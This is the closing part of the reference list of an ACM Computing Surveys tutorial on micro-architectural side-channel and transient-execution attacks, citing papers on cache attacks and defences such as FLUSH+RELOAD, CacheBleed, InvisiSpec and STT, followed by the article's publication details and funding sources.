M. Yan, B. Gopireddy, T. Shull, and J. Torrellas. 2017. Secure hierarchy-aware cache replacement policy (SHARP): Defending against cache-based side channel attacks. In Proceedings of the 2017 ACM/IEEE 44th Annual International Symposium on Computer Architecture (ISCA). 347–360. Retrieved from http://iacoma.cs.uiuc.edu/iacoma-papers/isca17_2.pdf.
[176]
M. Yan, R. Sprabery, B. Gopireddy, C. Fletcher, R. Campbell, and J. Torrellas. 2019. Attack directories, not caches: Side channel attacks in a non-inclusive world. In Proceedings of the 2019 IEEE Symposium on Security and Privacy (SP). 888–904. Retrieved from http://iacoma.cs.uiuc.edu/iacoma-papers/ssp19.pdf.
[177]
Mengjia Yan, Jiho Choi, Dimitrios Skarlatos, Adam Morrison, Christopher Fletcher, and Josep Torrellas. 2018. InvisiSpec: Making speculative execution invisible in the cache hierarchy. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). 428–441.
[178]
Fan Yao, Milos Doroslovacki, and Guru Venkataramani. 2018. Are coherence protocol states vulnerable to information leakage? In Proceedings of the 2018 IEEE International Symposium on High Performance Computer Architecture (HPCA). 168–179.
[179]
Yuval Yarom and Katrina Falkner. 2014. FLUSH+RELOAD: A high resolution, low noise, L3 cache side-channel attack. In Proceedings of the 23rd USENIX Security Symposium (USENIX Security 14). USENIX Association, San Diego, CA, 719–732. Retrieved from https://www.usenix.org/conference/usenixsecurity14/technical-sessions/presentation/yarom.
[180]
Yuval Yarom, Daniel Genkin, and Nadia Heninger. 2016. CacheBleed: A timing attack on OpenSSL constant time RSA. In Proceedings of CHES 2016. Springer, 346–367.
[181]
Tse-Yu Yeh and Yale N. Patt. 1993. A comparison of dynamic branch predictors that use two levels of branch history. In Proceedings of the 20th Annual International Symposium on Computer Architecture. 257–266.
[182]
Jiyong Yu, Mengjia Yan, Artem Khyzha, Adam Morrison, Josep Torrellas, and Christopher W. Fletcher. 2019. Speculative taint tracking (STT): A comprehensive protection for speculatively accessed data. In Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’52). Association for Computing Machinery, New York, NY, 954–968.
[183]
Sizhuo Zhang, Muralidaran Vijayaraghavan, and Arvind. 2017. Weak memory models: Balancing definitional simplicity and implementation flexibility. In Proceedings of the 2017 26th International Conference on Parallel Architectures and Compilation Techniques (PACT). 288–302.
[184]
Xingjian Zhang, Ziqi Yuan, Rui Chang, and Yajin Zhou. 2021. Seeds of SEED: H2Cache: Building a hybrid randomized cache hierarchy for mitigating cache side-channel attacks. In Proceedings of the IEEE International Symposium on Secure and Private Execution Environment Design (SEED). IEEE.
[185]
Ziqiao Zhou, Michael K. Reiter, and Yinqian Zhang. 2016. A software approach to defeating side channels in last-level caches. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS’16). Association for Computing Machinery, New York, NY, 871–882. Retrieved from https://www.cs.unc.edu/ziqiao/papers/ccs2016.pdf.
[186]
Ziqiao Zhou, Michael K. Reiter, and Yinqian Zhang. 2016. A software approach to defeating side channels in last-level caches. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. 871–882.

        Published In

        ACM Computing Surveys, Volume 56, Issue 3, March 2024, 977 pages
        EISSN: 1557-7341
        DOI: 10.1145/3613568

        Publisher

        Association for Computing Machinery, New York, NY, United States

        Publication History

        Published: 06 October 2023
        Online AM: 10 June 2023
        Accepted: 31 May 2023
        Revised: 01 April 2023
        Received: 28 July 2022
        Published in CSUR Volume 56, Issue 3


        Author Tags

        1. Micro-architecture
        2. transient-execution attacks
        3. side-channel analysis

        Qualifiers

        • Tutorial

        Funding Sources

        • National Funds through the Fundação para a Ciência e a Tecnologia (FCT)
        • Instituto de Engenharia de Sistemas e Computadores: Investigação e Desenvolvimento (INESC-ID)
        • European Union, Scaling extreme analYtics with Cross-architecture acceLeration based on OPen Standards (SYCLOPS)
        • FCT, Portugal
